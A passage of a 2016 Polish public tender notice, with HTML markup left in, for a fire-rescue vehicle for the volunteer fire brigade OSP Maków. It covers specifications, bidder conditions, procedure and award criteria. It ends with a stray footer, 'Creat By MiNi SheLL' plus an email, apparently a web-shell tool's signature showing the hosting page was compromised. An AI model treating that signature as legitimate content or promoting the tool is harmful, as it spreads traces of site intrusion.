4.31	Pojazd  wyposażony w wysuwany maszt oświetleniowy  z głowicą z 4 (czterema)  lub 2 (dwoma) reflektorami, wyposażonymi w  lampy  LED o strumieniu świetlnym
 min.30 000 lumenów, zasilany z instalacji elektrycznej pojazdu napięciem  24V, wyposażonymi w soczewki zapewniające  szerokie rozproszenie światła.  
	wysokość rozłożonego masztu, mierzona od podłoża do oprawy reflektorów - minimum  5 metrów;
	obrót i pochył reflektorów, o kąt co najmniej od 0 ÷ 150 - w obie strony;
	sterowanie masztem odbywa się z poziomu ziemi;  
	złożenie masztu następuje, bez konieczności ręcznego wspomagania; 
	w kabinie  znajduje się sygnalizacja informująca o wysunięciu masztu; 
	wymagana możliwość sterowania masztem na różnej wysokości wysuwu;
	wysuw masztu  realizowany z instalacji pneumatycznej samochodu;
oprócz ręcznego, wymagane bezprzewodowe sterowanie masztem (pilotem) obrotem i pochyłem reflektorów oraz załączeniem oświetlenia, dla każdego reflektora osobno (zasięg min 50m).
V.	WYPOSAŻENIE
5.1	Pojazd wyposażony w sprzęt  standardowy, dostarczany z podwoziem, min: 
2 kliny, klucz do kół, podnośnik hydrauliczny z dźwignią, trójkąt ostrzegawczy, apteczka, gaśnica,  wspornik  zabezpieczenia podnoszonej kabiny,  
5.2	Na pojeździe   zapewnione miejsce na przewożenie sprzętu zgodnie z  Wymaganiami dla samochodów ratowniczo-gaśniczych.
Szczegóły dotyczące rozmieszczenia sprzętu do uzgodnienia z użytkownikiem na etapie realizacji zamówienia.
5.3	Samochód należy doposażyć w :
	z przodu pojazdu montaż wyciągarki  elektrycznej o sile uciągu minimum -8 ton z liną o długości min.   
   30 m, wraz z pokrowcem, zawiesiem o długości 3m dostosowanym do parametrów wyciągarki  2szt, oraz zbloczem
	4 szt latarek kątowych typu Ex z ładowarkami i  4 szt- radiostacji Motorola  GP 360 - z ładowarkami i z obsadą kanałową lub równoważnych , zamontowane w kabinie na specjalnym podeście;
	2 szt drabin nasadkowych
	4szt mostków przejazdowych
	 w kamerę monitorującą strefę z tyłu pojazdu . Kamera przystosowana do pracy w każdych warunkach atmosferycznych .Monitor przekazujący obraz ,kolorowy o przekątnej min 5 cali , zamontowany w kabinie w zasięgu wzroku kierowcy.
VI.	OZNACZENIE
6.1	Wykonanie na drzwiach kabiny od strony kierowcy oraz dowódcy: napisów OSP MAKÓW i herbu Gminy Maków oraz   oznakowanie numerami  operacyjnymi zgodnie z obowiązującymi wymogami KG PSP
VII.	OGÓLNE
7.1	Gwarancja: 
Na podwozie samochodu min. 24 miesiące  
Na nadwozie i zabudowę pożarniczą- min. 24 miesiące              
<br /><br /><b>II.5) Główny kod CPV: </b>34144210-3<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/11/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa niniejszego warunku udziału w
postępowaniu.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa niniejszego warunku udziału w
postępowaniu.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie określa niniejszego warunku udziału w
postępowaniu.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">-Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

-Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">- Certyfikat wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę, jako środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia
- Zaświadczenia niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji dodatkowej</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/09/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com